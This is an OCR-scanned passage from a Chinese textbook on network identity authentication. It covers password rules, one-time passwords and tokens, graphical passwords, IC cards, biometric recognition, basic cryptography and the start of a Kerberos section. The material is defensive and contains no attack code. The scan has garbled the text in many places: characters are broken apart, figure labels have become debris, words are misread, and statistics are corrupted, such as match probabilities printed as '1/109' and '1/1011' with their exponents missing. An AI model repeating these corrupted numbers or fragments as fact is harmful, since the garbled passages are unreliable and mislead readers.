为 了 提高 口令 认证 的 安全 性 ,网 络 系统 需要 对 口令 信息 进行 安全 加 密 存储 和 传输 ,限制 

登录 次 数 , 禁 止 共享 账号 和 口令 ,设计 或 采用 安全 的 口令 认证 协议 ,等 等 。 

另外 ,用 户 要 避免 使 用 弱 口 令 ,具体 要 求 如 下 : 

。 口令 的 长 度 应 至 少 为 8 个 字符 以 上 。 

。 口令 字符 应 由 大 小 写 英 文字 母 数字、 特殊 字符 组 合 而 成 。 

。 口令 不 能 与 账号 名 称 相同 。 

。 不 能 用 生日 .电话 号 码 和 其 他 一 些 常用 词 等 容易 被 猜测 到 的 字符 串 作 为 口令 。 

。 所 选 口令 不 能 包含 在 黑客 攻击 的 字典 库 中 。 

。 避免 使 用 系统 默认 口令 。 

。 经 常 更 改口 令 ,口令 应 有 时 效 性 。 

3.2.1.2 动态 口令 

动态 口令 也 称 为 一 次 性 口令 (One Time Password,OTP) ,这 项 技术 是 一 种 让 用 户 密码 


按照 时 间或 使 用 次 数 不 断 变化 、 每 个 密码 只 能 使 用 一 次 的 技术 。 用 户 进行 认证 时 , 除 输 入 账 
号 和 静态 口令 之 外 ,还 必须 输入 动态 密码 。 动 态 口令 认证 技术 被 认为 是 目前 能 够 最 有 效 地 
解决 用 户 的 身份 认证 安全 性 的 方式 之 一 ,可 以 有 效 防 范 黑客 木马 盗窃 用 户 账户 口令 、 假 网 站 
等 多 种 网 络 安全 问题 。 


动态 口令 从 生成 方式 上 分 为 挑战 /响应 认证 .时 间 同 步 认证 .事件 同步 认证 3 种 。 
(1) 挑战 /响应 (Challenge/Response) 认 证 。 

认证 过 程 如 下 : 

第 一 步 , 用 户 向 系统 发 出 认证 请 求 。 
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第 二 步 ,系统 产生 一 个 随机 数 发 送 给 用 户 ,用 户 将 这 个 随机 数 作为 客户 端 验证 算法 的 输 
入 ,此 为 挑战 。 

第 三 步 ,客户 端 将 验证 算法 的 输出 (假设 为 X) 发 送 给 系统 ,此 为 响应 。 

第 四 步 ,系统 按照 同样 的 算法 计算 出 一 个 结果 (假设 为 Y) ,然后 将 用 户 发 送 来 的 X 和 Y 
进行 比较 ,从 而 验证 用 户 的 身份 。 

由 于 验证 算法 只 在 客户 端 和 系统 端 进行 运算 ,不 经 过 网 络 传输 ,提高 了 安全 性 。 另 外 ， 
针对 用 户 的 每 一 次 认证 请 求 , 系 统 都 会 产生 一 个 随机 数 给 用 户 , 所 以 每 次 的 认证 信息 都 不 
同 ,即使 被 外 人 截获 也 不 会 带 来 安全 上 的 问题 。 

(2) 时 间 同 步 (Time Synchronous) 认 证 。 

这 种 方式 是 以 客户 端 和 服务 器 端的 同步 时 间作 为 认证 的 随机 因素 。 客 户 端 和 服务 器 端 
都 以 用 户 登 录 时 的 时 间作 为 验证 算法 的 输入 。 系 统 将 用 户 发 送 来 的 认证 信息 与 本 地 验证 算 
法 运算 的 输出 进行 比较 ,从 而 完成 认证 。 

这 种 方式 对 双方 的 时 间 同 步 要 求 较 高 ,通常 要 求 客 户 端 时 间 与 系统 时 间 误 差 不 超 过 
60s, 否 则 需要 与 服务 器 对 时 以 保持 同步 。 

(3) 事件 同步 (Event Synchronous) 认 证 。 

这 种 方式 以 挑战 /响应 方式 为 基础 ,双方 根据 相同 的 前 后 相关 的 事件 序列 产生 一 系列 的 
动态 密码 ,然后 进行 比 对 验证 。 由 于 客户 端 可 能 会 产生 几 组 密码 从 而 造成 与 系统 的 不 同步 ， 
所 以 系统 要 能 自动 重新 同步 到 目前 使 用 的 密码 ,一旦 一 个 密码 被 使 用 过 后 ,在 密码 序列 中 所 
有 这 个 密码 之 前 的 密码 都 会 失效 。 

事件 同步 认证 的 优点 是 认证 卡 容易 使 用 ; 事件 同步 是 唯一 可 以 在 批 次 运行 环境 下 使 用 
的 技术 ,因为 可 以 预先 产生 未 来 预计 要 使 用 的 密码 ; 由 于 使 用 者 无 法 知道 序列 数字 ,所 以 这 
种 认证 方式 安全 性 高 ,序列 号 码 绝 不 会 显示 出 来 。 

根据 口令 生成 终端 可 以 将 动态 口令 分 为 手机 令 牌 、 短 信和 密码 ,硬件 令 牌 ,智能 卡 等 ,其 中 
手机 令 牌 和 硬件 令 牌 统称 为 动态 令 牌 。 下 面 介绍 主流 的 短信 和 密码 和 动态 令 牌 。 

(1) 短信 密码。 

短信 密码 属于 手机 动态 口令 的 形式 。 身 份 认证 系统 以 短信 形式 发 送 随 机 的 6 位 或 8 位 
口令 到 用 户 的 手机 上 ,用 户 在 登录 或 者 交易 认证 时 输入 此 动态 口令 ,从 而 确保 系统 身份 认证 
的 安全 性 。 短 信 密 码 由 于 其 安全 性 、 普 及 性 、 易 收费 . 易 维 护 等 优点 ,被 广泛 应 用 于 电子 商 
务 .银行 金融 .第 三 方 支付 等 领域 。 

(2) 手机 令 牌 。 

手机 令 牌 也 称 手机 口令 牌 , 是 用 来 生成 动态 口令 的 手机 客户 端 软 件 。 

手机 作为 动态 口令 生成 的 载体 ,在 生成 动态 口令 的 过 程 中 不 会 产生 任何 通信 及 费用 ,不 
会 在 通信 信道 中 被 截取 , 欠 费 和 无 信号 对 其 不 产生 任何 影响 。 由 于 其 具有 高 安全 性 、 零 成 
本 无 须 携 带 、 无 物流 等 优势 , 相 比 硬件 令 牌 其 更 符合 互联 网 的 精神 。 

手机 令 牌 实质 上 是 把 动态 密码 技术 用 手机 软件 的 方式 实现 。 软 件 启动 后 ,会 运算 产生 
一 个 不 可 猜测 的 动态 密码 ,而 且 该 软件 可 以 运行 在 Android\iOS、 Symbian 等 手机 操作 系统 
中 。 因 此 ,手机 令 牌 已 经 成 为 3G/4G 时 代 动 态 密码 身份 认证 令 牌 的 主流 形式 。 

(3) 硬件 令 牌 。 

当前 最 主流 的 硬件 令 牌 是 基于 时 间 同 步 的 ,动态 口令 是 根据 专门 的 密码 生成 算法 每 隔 
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60s 生成 一 个 与 时 间 相 关 的 、 不 可 预测 的 随机 数字 组 合 (通常 为 6 位 或 8 位 ), 每 个 口令 只 能 
使 用 一 次 ,每 天 可 以 产生 43 200 个 密码 。 图 3. 2 是 硬件 令 牌 的 实物 。 
动态 口令 作为 最 安全 的 身份 认证 技术 之 一 ,目前 已 经 被 越 _ 
来 越 多 的 行业 所 采用 。 其 最 大 的 优点 在 于 ,用 户 每 次 使 用 的 口 eS 
令 都 不 相同 ,即使 黑客 截获 了 一 次 密码 ,也 无 法 利用 这 个 密码 Ss=—=—= 
来 仿冒 合法 用 户 的 身份 。 但 动态 口令 认证 技术 仍然 存在 用 户 N= 
操作 烦琐 (每 次 都 要 输入 不 同 的 口令 密码 ) ,服务 器 端 和 客户 端 
的 时 间 要 保持 同步 等 问题 。 


3.2.1.3 图 形 密码 认证 

传统 的 口令 认证 技术 是 依据 用 户 提交 的 用 户 ID 和 相应 的 文本 口令 ,这 种 字符 式 口 令 存 
在 诸多 缺点 。 图 形 密码 使 用 图 形 作为 认证 媒介 ,通过 用 户 对 图 形 的 单 击 、 识 别 、 重 现 或 者 用 
户 与 图 形 系统 的 互动 进行 认证 。 科 学 研究 表明 ,人 们 对 图 形 的 记忆 能 力 明 显 优 于 对 文字 的 
记忆 能 力 , 并 且 , 随 着 图 形 数量 的 增多 ,图形 密 码 的 密 钥 空 间 要 远大 于 文本 密码 ,因此 ,其 安 
全 性 也 高 于 文本 密码 。 

根据 图 形 密码 认证 的 实现 方式 不 同 , 可 以 将 图 形 密码 分 为 两 类 : 基于 识别 型 和 基于 回 
忆 型 的 图 形 密 码 。 

基于 识别 型 的 图 形 密码 身份 认证 要 求 用 户 记 忆 预 先 选 
定 的 一 些 特定 图 形 ,在 认证 阶段 ,系统 会 随机 产生 一 组 图 形 ， 
让 用 户 从 中 选 出 预先 设 定 的 图 形 , 从 而 实现 身份 认证 。 

基于 回忆 型 的 图 形 密码 身份 认证 则 要 求 用 户 重 复 以 前 
设 定 图 形 的 过 程 。 例 如 ,在 一 种 基于 回忆 型 的 图 形 密码 身份 
认证 方法 中 ,在 设 定 密码 阶段 ,系统 会 要 求 用 户 在 平面 栅 格 
上 绘制 出 图 形 口 令 。 在 验证 阶段 ,系统 会 显示 同样 的 栅 格 ， 
要 求 用 户 重复 原来 的 设 定 过 程 ,如 果 用 户 能 够 按照 预定 的 规 。 图 3.3 一 种 基于 回忆 型 的 
则 绘制 图 形 则 通过 验证 。 图 3. 3 为 目前 智能 手机 、 电 子 产品 图 形 密 码 
等 使 用 较为 广泛 的 一 种 基于 回忆 型 的 图 形 密码 。 


3.2 硬件 令 牌 








3.2.2 IC 卡 认证 


IC 卡 (Integrated Circuit Card, 集 成 电路 卡 ) 认 证 属于 基于 用 户 所 拥有 的 实物 进行 鉴别 
的 机 制 。IC 卡 是 一 种 内 置 集成 电路 的 芯片 ,芯片 中 安全 存储 了 与 用 户 身份 相关 的 信息 。IC 
卡 由 专门 的 厂商 通过 专门 的 设备 生产 ,是 不 可 复制 的 硬件 。IC 卡 认证 技术 广泛 应 用 在 现今 
社会 的 各 个 方面 ,例如 第 二 代 身 份 证 ,各 地 的 市 民 卡 、 医 疗 卡 、 公 交 卡 等 。 

IC 卡 由 合法 用 户 随身 携带 ,登录 时 必须 通过 专用 的 读 卡 器 读 取 其 中 的 信息 ,以 验证 用 
户 的 身份 ,只 有 持 卡 人 才能 被 认证 。 

IC 卡 认 证 通过 IC 卡 硬件 不 可 复制 的 特性 来 保证 用 户 身 份 不 会 被 仿冒 。 然 而 由 于 每 次 
从 IC 卡 中 读 取 的 数据 是 静态 的 ,通过 内 存 扫描 或 网 络 监听 等 技术 还 是 很 容易 截取 用 户 的 身份 
验证 信息 ,所 以 需要 智能 卡 具备 对 信息 加 密 的 功能 。 另 外 ,IC 卡 认证 还 存在 一 个 缺陷 ,就 是 系 
统 只 认 卡 不 认 人 ,而 智能 卡 可 能 丢失 , 拾 到 或 窃 得 智能 卡 的 人 将 很 容易 假冒 原 持 卡 人 的 身份 。 
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为 了 解决 上 述 问 题 ,可 以 综合 前 面 提 到 的 两 类 方法 ,实行 双 因 子 认证 。 即 在 进行 认证 
时 , 既 要 求 用 户 输入 一 个 口令 ,又 要 求 使 用 IC 卡 。 这 样 ,只 要 口令 和 卡 不 同时 被 其 他 人 获 
取 , 用 户 就 不 会 被 冒充 。 


3.2.3 基于 生物 特征 的 认证 


3.2.3.1 生物 特征 识别 的 概念 

生物 特征 认 别 (Biometrics) 就 是 指 利用 人 的 独一无二 可靠、 稳定 的 生物 特征 来 验证 用 
户 身份 。 生 物 特征 是 指 可 以 测量 或 可 自动 识别 和 验证 的 唯一 的 生理 特征 或 行为 方式 。 生 物 
特征 分 为 身体 特征 和 行为 特征 两 类 。 常 见 的 被 用 来 进行 身份 验证 的 身体 特征 有 指纹 、 视 网 
膜 .虹膜 、 掌 型 .脸型 人 体 气味 .血管 和 DNA 等 ,行为 特征 有 语音 .笔迹 、 击 键 特征 .行走 步 
态 等 。 当 前 ,对 生物 特征 识别 的 研究 方兴未艾 ,并 且 在 许多 场合 (如 机 场 , 大 型 集会 ) 的 安保 
系统 中 已 有 应 用 ,起 到 了 重要 的 作用 。 从 理论 上 说 ,生物 特征 认 别 是 最 可 靠 的 身份 认证 方 
式 , 因 为 它 直接 使 用 人 的 物理 特征 来 表示 每 一 个 人 的 数字 身份 ,不 同 的 人 具有 不 同 的 生物 特 
征 ,几乎 不 可 能 被 仿冒 。 另 外 ,基于 生物 特征 的 认证 避免 了 其 他 认证 方法 中 存在 的 遗忘 、 信 
息 泄露 .硬件 丢失 等 现象 。 

能 被 用 来 作为 身份 识别 的 生物 特征 需要 具备 以 下 条 件 : 

。 普遍 性 , 即 每 个 人 都 应 该 具有 这 一 特征 。 

。 唯一 性 , 即 每 个 人 在 这 一 特征 上 有 不 同 的 表现 。 

。 稳定 性 , 即 这 一 特征 不 会 随 着 年 龄 的 增长 和 时 间 的 改变 而 改变 。 

。 易 采集 性 , 即 这 一 特征 应 该 是 容易 测量 的 。 

。 可 接受 性 , 即 人 们 是 否 接受 这 种 生物 识别 方式 。 

3.2.3.2 常见 的 生物 特征 识别 技术 

生物 特征 识别 系统 一 般 都 包括 对 生物 特征 的 采集 、 解 码 、 比 对 和 匹配 过 程 。 关 键 在 于 如 
何 表 示 和 采集 这 些 生物 特征 ,并 将 之 存储 于 计算 机 中 ,以 及 如 何 利用 有 效 、 可 靠 的 比 对 算法 
来 完成 用 户 身份 的 验证 。 

1. 指纹 识别 

指纹 识别 (fingerprint recognition) 是 目前 应 用 最 为 广泛 ,比较 成 熟 的 生物 识别 技术 。 
世界 各 地 纷纷 建立 了 指纹 鉴定 机 构 ,成 为 司法 刑侦 中 有 效 的 身份 鉴定 手段 。 

指纹 识别 处 理 包 括 指纹 图 像 采 集 、 指 纹 图 像 处 理 特征 提取 、 特 征 值 的 比 对 与 匹配 等 过 
程 。 对 指 尖 的 纹 线 进行 绘图 ,就 能 生成 指纹 。 指 纹 扫 描 器 能 够 读 取 指纹 并 将 其 转换 成 数字 
形式 ,这 些 数字 副本 可 用 来 与 存储 在 集中 计算 机 系统 中 的 经 过 授权 的 副本 进行 对 比 。 
图 3. 4 为 指纹 识别 过 程 。 


特征 值 模板 
国信 肖 强 
指纹 图 像 采集 | 一 | 。 特征 值 提取 | | 
比 对 m 配 。 | -| 天 


图 3.4 指纹 识别 过 程 
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基于 指纹 的 身份 识别 具有 以 下 优点 : 
。 独特 性 。 每 个 人 的 指纹 具有 唯一 性 。 从 几何 特征 到 模式 和 纹 线 大 小 ,每 个 指纹 都 有 
所 不 同 。 每 个 指纹 一 般 有 70 一 150 个 基本 特征 点 ,从 概率 学 的 角度 ,在 两 枚 指纹 中 
只 要 有 12 一 13 个 特征 点 吻合 , 即 可 认定 为 同一 指纹 , 按 现 有 人 口 计算 ,起 码 要 120 
年 才能 出 现 两 个 完全 相同 的 指纹 。 
。 稳定 性。 一 般 人 的 指纹 在 出 生 后 9 个 月 得 以 成 形 并 终身 不 变 。 
。 方便 性 。 目 前 已 有 标准 的 指纹 样本 库 , 便 于 识别 系统 的 软件 开发 ; 另外 ,识别 系统 
中 完成 指纹 采样 功能 的 硬件 部 分 ( 即 指纹 采集 仪 ) 也 较 易 实现 。 
。 安全 性 。 研 究 表明 指纹 识别 对 人 体 不 构成 侵犯 。 
但 是 ,指纹 识别 技术 也 存在 一 些 缺 陷 。 例 如 ,因为 系统 不 能 确定 一 个 指纹 是 来 自 活体 还 
是 来 自 一 个 副本 ,可 能 受到 欺骗 。 另 外 , 受 扫描 装置 或 手指 污渍 的 影响 会 降低 指纹 识别 的 可 
用 性 和 方便 性 。 
2. 掌 纹 识别 
每 个 人 的 手 的 形状 在 人 达到 一 定年 龄 之 后 就 不 再 发 生 显著 变化 ,而 且 都 不 同 。 掌 纹 识 
别 就 是 利用 手指 和 指 关 节 的 形状 和 长 度 等 特征 进行 身份 鉴定 。 
3. 视网膜 识别 
视网膜 认证 是 根据 人 眼 视网膜 中 的 血管 分 布 模式 的 不 同 来 进行 身份 鉴别 的 。 人 眼球 视 
网 膜 的 中 央 动 脉 ,在 眼底 至 视神经 乳头 处 分 为 上 下 两 支 ,然后 在 视网膜 矣 侧 上 下 及 鼻 侧 上 下 
再 分 为 4 支 小 动脉 ,各 支 小 动脉 再 逐 级 分 得 更 细 、 更 小 ,以 至 在 视网膜 上 形成 四 通 八 达 的 毛 
细 血 管 网 。 
研究 表明 人 了 眼 视网膜 中 的 血管 分 布 具 备 唯一 性 特征 , 且 在 健康 状况 下 非常 稳定 。 但 是 ， 
视网膜 的 采样 较 难 ,还 没有 标准 的 视网膜 样本 库 供 系 统 软 件 开 发 使 用 ,这 些 问 题 导致 视网膜 
识别 系统 在 目前 阶段 难以 开发 ,可 行 性 较 低 。 
4. 虹膜 识别 
人 眼 虹 膜 位 于 眼角 膜 之 后 ,水 晶体 之 前 ,其 颜色 因 含 色素 的 多 少 与 分 布 不 同 而 异 。 圆 盘 
状 的 虹膜 以 中 央 的 瞳孔 为 中 心 ,其 周围 有 辐射 状 的 纹理 和 小 止 。 每 个 人 虹膜 的 结构 都 不 相 
同 , 并 且 这 种 独特 的 虹膜 结构 在 人 的 一 生 几 乎 不 发 生变 化 。 科 学 研究 表明 ,世界 上 两 个 指纹 
相同 的 概率 为 1/109 ,而 两 个 虹膜 图 像 相 同 的 概率 是 1/1011。 因 此 ,虹膜 识别 的 错误 率 是 各 
种 生物 特征 识别 中 最 低 的 。 
虹膜 识别 技术 也 有 很 多 地 方 有 待 完善 : 当前 的 虹膜 识别 
系统 只 是 用 统计 学 原理 进行 小 规模 的 实验 ,而 没有 进行 现实 
世界 的 唯一 性 认证 实验 ,而 且 虹 膜 图 像 获取 设备 相当 昂贵 。 
5. 人 脸 识 别 
人 脸 识 别 (face recognition) 是 根据 人 脸 各 部 分 ,如 眼睛 、 
鼻子 、 展 部 .下 里 等 器 官 的 相互 位 置 ,以 及 它们 的 形状 和 尺 二 
来 区 分 人 脸 。 图 3.5 是 人 脸 识别 的 实例 。 
人 脸 识别 系统 主要 包括 4 个 组 成 部 分 : ld 
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。 人 脸 图 像 采集 及 检测 。 
。 人 脸 图 像 预 处 理 。 
。 人 脸 图 像 特征 提取 。 
。 匹配 与 识别 。 
与 基于 指纹 的 人 体 生物 识别 技术 相 比 ,人 脸 识别 是 一 种 更 直接 ,更 方便 更 友好 、 更 容易 
被 人 们 接受 的 识别 方法 。 由 于 人 的 脸 相 会 随 年 龄 变化 而 变化 ,而 且 容 易 被 伪装 ,所 以 人 脸 识 
别 不 是 特别 可 靠 。 
6. 语音 识别 
语音 识别 (voice recognition) 是 基于 人 的 声音 特征 (如 频率 ) 进 行 身份 鉴定 的 。 语 音 识 
别 与 指纹 识别 类 似 , 每 个 人 的 语音 特征 具有 唯一 性 。 但 是 人 的 声音 会 随 着 年 龄 的 增长 或 身 
体 的 健康 因素 而 发 生 较 大 的 变化 。 
7. 击 键 识别 
击 键 识 别 (typing biometrics) 属 于 人 的 行为 特征 识别 ,检查 的 是 计算 机 用 户 的 击 键 特 
征 , 包 括 速 度 .方式 力度 . 击 键 持续 时 间 \ 击 键 间隙 反应 时 间 ( 前 一 次 击 键 与 后 一 次 击 键 之 间 
的 延迟 ) 等 。 一 般 来 说 , 击 键 识别 技术 需要 与 其 他 认证 方式 相 结合 ,比如 在 用 户 输入 登录 口 
令 时 发 现 有 背离 参考 数据 的 情况 出 现 ,系统 应 该 要 求 和 人 允许 用 户 通过 其 他 认证 技术 实现 
8. 笔迹 识别 
笔迹 (签名 ) 识 别 也 称 为 签名 力学 辨识 (Dynamic Signature Verification, DSV), 它 不 是 
对 签名 图 像 本 身 的 分 析 , 而 是 通过 对 用 户 签名 时 的 速度 、 加 速度 、 笔 压力 及 笔画 长 度 等 特征 
的 分 析 来 鉴别 用 户 签名 。 
笔迹 属于 人 的 一 种 行为 特征 ,笔迹 的 获取 具有 非 侵 犯 性 (或 非 接触 性 ) , 易 被 人 接受 。 但 
是 人 的 笔迹 往往 会 有 变化 ,身体 状况 和 情绪 变化 也 会 影响 到 笔迹 。 此 外 ,经 过 专门 训练 的 人 
可 以 对 笔迹 进行 模仿 。 这 些 都 增 大 了 笔迹 识别 的 难度 。 
9. DNA 识别 
DNA 是 包含 一 个 人 所 有 遗传 信息 的 片段 ,与 生 俱 来 ,并 终身 保持 不 变 。 这 种 遗传 信息 
蕴含 在 人 的 骨 镶 .毛发 .血液 .唾液 等 所 有 人 体 组 织 器 官 中 。 近 年 来 ,科学 家 们 开发 出 多 种 
DNA 遗传 标记 用 于 个 体 识 别 。 人 的 DNA 图 谱 完 全 相同 的 概率 仅 为 三 千 亿 分 之 一 。 因 此 ， 
通过 DNA 识别 可 以 提供 比较 可 靠 的 身份 识别 。 
3.2.3.3 生物 特征 识别 认证 小 结 
随 着 社会 对 网 络 安全 越 来 越 重视 ,基于 生物 特征 识别 的 身份 认证 技术 也 越 来 越 受 到 重 
视 , 因 为 与 传统 身份 认证 技术 相 比 ,生物 识别 技术 具有 以 下 特点 : 
。 安全 性 更 高 。 每 个 人 拥有 的 生物 特征 各 不 相同 ,人 的 生物 特征 是 个 人 身份 的 最 好 证 
明 ,满足 更 高 的 安全 需求 。 

。 稳定 性 好 。 指 纹 、 虹 膜 等 人 体 生物 特征 不 会 随 年 龄 等 条 件 的 变化 而 变化 。 

。 使 用 方便 。 每 个 人 都 具有 自身 独特 的 生物 特征 ,用 户 不 需要 记忆 密码 和 携带 硬件 
(如 IC 卡 )。 
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在 设计 或 评价 一 个 生物 特征 识别 系统 时 ,还 要 考虑 以 下 几 个 方面 : 
。 易 采 集 性 。 选 择 的 生物 特征 易于 测量 ,便于 用 户 使 用 。 
。 易 接 受 性 。 选 择 的 个 人 生物 特征 在 采集 时 尽量 减 小 对 用 户 的 侵犯 ,使 用 户 更 愿意 
接受 。 
。 可 行 性 。 包 括 对 系统 资源 的 要 求 ,数据 获取 和 分 析 的 速度 .识别 的 精确 性 和 抗 攻击 
能 力 。 
。 人 性价比 。 针 对 实际 的 应 用 需求 平衡 软 硬 件 和 系统 维护 费用 与 性 能 。 
本 节 所 述 的 各 种 生物 特征 识别 技术 各 有 优 劣 ,有 各 自 的 适用 范围 ,有 些 技术 还 不 够 成 
熟 ,准确 性 和 稳定 性 有 待 提高 ,还 存在 实施 成 本 高 的 缺点 。 另 外 ,生物 特征 识别 是 建立 在 假 
设 从 生物 特征 识别 装置 到 认证 系统 的 过 程 中 是 完全 安全 的 基础 上 的 。 如 果 生 物 特征 识别 信 
息 在 网 络 传输 过 程 中 被 获取 ,那么 就 面临 身份 假冒 攻击 的 危险 。 但 是 , 随 着 计算 机 性 能 的 不 
断 增强 和 模式 识别 .图 像 处 理 等 技术 的 不 断 完 善 ,将 基于 生物 特征 的 身份 识别 技术 融合 在 网 
络 安全 策略 设计 中 将 得 到 推广 ,从 而 大 大 增强 网 络 的 安全 性 。 在 对 安全 有 严格 要 求 的 应 用 
领域 中 ,往往 需要 结合 多 种 生物 特征 来 实现 更 高 精度 ,更 可 靠 的 身份 识别 系统 。 


3.3 网 络 身份 认证 协议 


网 络 环境 下 的 身份 认证 一 般 通 过 某 种 身份 认证 协议 来 实现 。 身 份 认 证 协议 一 般 基于 密 
码 相关 技术 实现 ,定义 了 参与 认证 服务 的 各 通信 方 在 身份 认证 过 程 中 需要 交换 的 所 有 消息 
的 格式 、 这 些 消息 发 生 的 次 序 以 及 消息 的 语义 。 

基于 密码 学 原理 的 身份 认证 协议 能 够 提供 更 多 、 更 安全 的 服务 。 各 种 密码 学 技术 都 可 
以 用 来 构造 网 络 身份 认证 协议 ,按照 所 采用 的 密码 技术 的 不 同 通常 分 为 基于 对 称 密码 技术 
的 认证 和 基于 非 对 称 密码 技术 的 认证 两 种 。 


3.3.1 密码 技术 简介 


随 着 计算 机 网 络 的 发 展 ,密码 技术 成 为 网 络 与 信息 安全 的 关键 技术 之 一 ,是 数字 签名 、 
数字 证 书 和 公共 密 钥 基础 设施 (PKI) 等 安全 措施 的 基础 。 

在 密码 技术 中 ,将 需要 存储 或 者 传输 的 原始 数据 称 为 明文 (plaintext) ,加 密 之 后 的 数据 
称 为 密 文 (cipher) , 密 文 是 无 序 的 数据 ,其 内 容 无 法 理解 。 加 密 (encryption) 是 将 明文 经 过 
编码 使 其 转化 为 密 文 的 过 程 ,解密 (decryption) 是 将 密 文 还 原 为 明文 的 过 程 。 

加 密 和 解密 过 程 中 使 用 的 算法 称 为 密码 算法 ,是 一 个 以 加 密 / 解 密 密 钥 (key) 为 参数 的 
函数 。 密 钥 是 二 进 制 数 的 变量 ,用 比特 作为 其 长 度 单位 , 密 钥 越 长 越 不 容易 被 “破解 ”。 

在 现代 密码 学 研究 中 ,加 密 和 解密 算法 一 般 都 是 公开 的 ,任何 人 只 要 获知 了 密 钥 就 能 对 
密 文 进行 解密 ,所 以 , 密 钥 的 设计 与 保护 成 为 防范 攻击 的 重点 。 根 据 所 用 密 钥 的 不 同 ,密码 
技术 通常 分 为 对 称 密码 技术 和 非 对 称 密码 技术 两 种 。 

1. 对 称 密码 

对 称 密码 (symmetric key cryptography) 也 称 作 私 钥 密码 ,其 加 密 和 解密 采用 相同 的 密 
钥 。 发 送 者 和 接收 者 在 进行 安全 的 通信 之 前 必须 共享 相同 的 密 钥 。 
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对 称 密码 技术 从 加 密 模式 上 可 分 为 两 类 : 

。 流 (stream) 加 密 。 对 明文 数据 进行 逐 比 特 位 加 密 得 到 密 文 。 

。 块 (block) 加 密 。 将 明文 分 成 固定 长 度 的 块 ( 如 64 位 一 块 ) ,用 同一 密 钥 和 算法 对 每 

一 块 加 密 , 输 出 固定 长 度 的 密 文 。 

对 称 密码 算法 的 处 理 速 度 通常 要 比 非 对 称 密码 算法 快 。 但是, 对称 密码 算法 的 安全 性 
取决 于 密 钥 的 安全 性 ,任何 持 有 密 钥 的 人 都 能 够 加 密 和 解密 消息 。 所 以 ,对 密 钥 的 管理 和 传 
输 的 安全 性 要 求 较 高 。 

对 称 密码 中 最 常见 的 算法 有 DES、IDEA、3DES、AES(Advanced Encryption Standard， 
高 级 加 密 标准 )。 后 面 要 介绍 的 Kerberos 身份 认证 系统 就 采用 了 DES 算法 。 

2. 非 对 称 密码 技术 

非 对 称 密码 (asymmetric key cryptography) 中 加 密 和 解密 采用 一 对 不 同 的 相关 的 密 
钥 。 每 个 通信 方 均 需要 有 两 个 相关 的 密 钥 ,通常 将 加 密 密 钥 公开 , 称 为 公 钥 (public key) ,而 
解密 密 钥 要 求 保密 , 称 为 私 钥 (private key), 所 以 也 称 为 公共 密 钥 密码 (public key 
cryptography) 技 术 。 

由 于 非 对称 密 码 技术 中 不 需要 传输 共享 密 钥 ,所 以 减少 了 密 钥 泄露 的 可 能 性 。 另 外 ,由 
于 每 一 对 通信 双方 采用 了 不 同 的 私 钥 ,就算 某 个 私 钥 泄露 了 ,其 他 通信 对 的 安全 也 不 会 受到 
影响 。 

非 对 称 密码 技术 的 复杂 度 要 高 于 对 称 密码 系统 ,速度 为 对 称 密码 技术 的 1/100 一 
1/1000。 所 以 ,常用 它 来 对 少量 关键 数据 进行 加 密 ,或 者 用 于 数字 签名 。 例 如 ,将 非 对 称 密 
码 技术 与 对 称 密码 技术 相 结合 , 即 用 非 对 称 密码 在 通信 双方 之 间 传 送 对 称 密 钥 ,用 对 称 密码 
对 实际 传输 的 数据 进行 加 密 、 解 密 。 

应 用 最 广泛 的 非 对 称 密码 算法 是 RSA( 由 Rivest、Shamir 和 Adleman 提出 的 并 以 他 们 
的 名 字 首 字母 命名 ) ,典型 的 应 用 有 安全 套 接 字 层 (Secure Socket Layer,SSL) 协 议 。 其 他 还 
有 ElGamal、DSS 和 Diffie-Hellman 等 算法 ,这 些 算 法 的 复杂 度 和 提供 的 功能 各 不 相同 。 
ElGamal 和 DSS 算法 实现 签名 但 是 没有 加 密 ; Diffie-Hellman 算法 用 于 建立 共享 密 钥 , 没 
有 签名 也 没有 加 密 ,一 般 与 对 称 密码 技术 结合 使 用 。 


3.3.2 对称 密码 认证 


3.3.2.1 概述 

传统 的 基于 用 户 名 /口令 的 身份 认证 方式 是 对 用 户 提 交 的 用 户 名 /口令 进行 验证 ,而 用 
户 名 /口令 在 传输 过 程 中 可 能 会 发 生 汇 露 。 基 于 挑战 /响应 的 技术 可 以 实现 既 能 够 对 用 户 所 
拥有 的 秘密 信息 (如 口令 ) 进 行 验 证 ,又 不 会 发 生 泄露 。 

但 是 ,在 网 络 环境 中 ,一 台 计 算 机 (如 服务 器 ) 需 要 与 很 多 用 户 进行 身份 认证 ,如 果 为 每 
个 用 户 都 建立 共享 密 钥 , 则 增加 了 密 钥 创建 ,维护 和 更 新 的 复杂 性 ,同时 降低 了 安全 性 。 
1978 年 Needham 和 Schroeder 提出 了 密 钥 分 发 中 心 (Key Distribution Center, KDC) 的 概 
念 ,KDC 与 每 个 网 络 通信 方 都 有 一 个 共享 密 钥 ,并 且 被 通信 各 方 所 信任 。 每 对 通信 方 之 间 
的 认证 都 借助 于 KDC 这 个 可 信 第 三 方 完成 。KDC 负责 为 通信 双方 创建 并 分 发 共享 密 钥 ， 
通信 双方 获得 共享 密 钥 后 再 利用 挑战 /响应 方式 建立 信任 关系 。 
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Kerberos 是 由 美国 麻 省 理工 学 院 (MIT) 开 发 的 一 个 认证 协议 ,得 到 了 广泛 的 使 用 ， 
Kerberos 版 本 5 已 被 Internet 工程 任务 部 (IEIF) 正 式 接受 为 RFC 1510, 成 为 网 络 通 信 中 身 
份 认证 的 事实 标准 。Kerberos( 或 Cerberus) 原 意 是 古 希 腊 神话 中 的 一 种 有 3 个头 的 凶猛 的 
狗 ,是 地 狱 的 门卫 。 

Kerberos 的 基本 原理 是 : 利用 对 称 密码 (DES 算法 ) ,通过 可 信 的 第 三 方 (KDC) 对 网 络 
上 通信 的 实体 进行 相互 身份 认证 ,并 在 用 户 和 服务 器 之 间 建 立 安全 信道 ,能 够 阻止 旁听 和 重 
放 等 攻击 。 其 基本 理念 就 是 : 如 果 通 信 双 方 都 知道 密 钥 ,双方 就 可 以 通过 确定 对 方 知道 密 
钥 来 相互 确认 身份 。 

一 个 Kerberos 系统 涉及 以 下 一 些 基 本 实体 和 概念 : 


客户 端 (Client) : 用 户 用 来 访问 服务 器 的 设备 。 

目标 服务 器 (Target Server) : 用 户 请 求 的 应 用 服务 器 。 

认证 服务 器 (Authentication Server, AS): 为 用 户 分 发 票据 授权 票据 (Ticket 
Granting Ticket,TGT) 的 服务 器 。 用 户 使 用 TGT 向 票据 授权 服务 器 (Ticket 
Granting Server,TGS) 证 明 自 己 的 身份 。 

TGS: 为 用 户 分 发 到 目的 应 用 服务 器 的 票据 (Ticket) 的 服务 ,用 户 使 用 这 个 票据 向 
